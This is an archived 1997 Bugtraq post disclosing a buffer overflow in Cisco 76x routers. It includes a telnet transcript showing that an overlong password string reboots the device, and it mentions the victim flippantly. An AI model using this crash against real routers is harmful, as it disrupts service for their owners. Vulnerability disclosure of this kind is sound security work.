Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1997_4

Bugtraq archives for 4th quarter (Oct-Dec) 1997: cisco 76x buffer overflow

cisco 76x buffer overflow

Laslo Orto (LasloCPOL.COM)
Thu, 11 Dec 1997 01:11:13 -0500

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: ralfUNI-KOBLENZ.DE: "Re: cisco 76x buffer overflow"
Previous message: Thomas Stromberg: "Re: Yahoo hacked"
Next in thread: ralfUNI-KOBLENZ.DE: "Re: cisco 76x buffer overflow"

I dont know of anybody ever posting anything on this sbuject, so i'll go
ahed. I found a buffer overflow in the cisco 76x
series router. The bug exists only in the 4 users limit software, i couldnt
reproduce it with the unlimited version.
When i reported the bug to cisco i promised them that i'll post this info to
public if they dont fix it withing a week.
It was over a month ago, and i was never notified of any fix so i'm asuming
they didnt make any fix. I also cant find any
mentioning of this bug on their web site by searching for the bug id.
The exploit is prety simple:
telnet cisco762.domain.com
Trying 1.2.3.4...
Connected to 1.2.3.4.
Escape character is '^]'.
Enter Password:Enter a
veryyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy
yyyyyyyyyyyyyyyyyyyyyyyyyyyy long string here
and watch the prety lights go on as the cisco reboots, or imagine your
victim tearing his hair out.

Next message: ralfUNI-KOBLENZ.DE: "Re: cisco 76x buffer overflow"
Previous message: Thomas Stromberg: "Re: Yahoo hacked"
Next in thread: ralfUNI-KOBLENZ.DE: "Re: cisco 76x buffer overflow"